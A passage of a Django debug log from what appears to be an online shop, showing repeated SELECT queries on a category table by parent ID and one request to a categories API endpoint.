"shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:13:33,790 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:13:33,793 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:13:33,796 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:13:33,798 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:13:33,800 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:13:33,802 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:13:33,806 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:13:33,808 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:13:33,811 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:13:33,813 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:13:33,816 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:13:33,821 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:13:33,823 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:13:33,825 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:13:33,828 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:13:33,831 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:13:33,834 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:13:33,839 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:13:33,842 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:13:33,845 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:13:33,849 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:13:33,852 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:13:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:13:41,832 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:13:41,839 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:13:41,843 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:13:41,846 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:13:41,851 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:13:41,854 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:13:41,856 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:13:41,860 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:13:41,862 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:13:41,866 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:13:41,868 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:13:41,870 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:13:41,873 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:13:41,876 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:13:41,881 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:13:41,883 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:13:41,886 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:13:41,889 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:13:41,892 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:13:41,897 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:13:41,900 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:13:41,904 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:13:41,907 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:13:41,910 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:13:41,913 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:13:41,917 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:13:41,920 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:13:41,923 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:13:41,926 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:13:41,929 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:13:41,933 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:13:41,936 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:13:41,939 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:13:41,942 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:13:41,945 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:13:41,952 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:13:41,956 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:13:41,960 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:13:41,963 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:13:41,967 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:13:41,970 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:13:41,974 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:13:41,978 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:13:41,981 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:13:41,985 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:13:41,989 utils 20136 140506667599616 (0.001) SELECT 